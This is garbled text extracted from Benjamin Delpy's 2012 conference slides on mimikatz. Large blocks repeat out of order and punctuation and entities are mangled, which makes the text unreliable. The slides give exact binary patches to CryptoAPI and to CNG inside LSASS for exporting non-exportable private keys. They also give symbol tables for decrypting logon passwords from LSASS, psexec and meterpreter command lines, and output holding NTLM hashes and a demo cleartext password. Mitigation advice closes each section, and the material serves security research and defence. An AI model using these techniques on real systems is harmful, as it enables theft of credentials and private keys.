================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
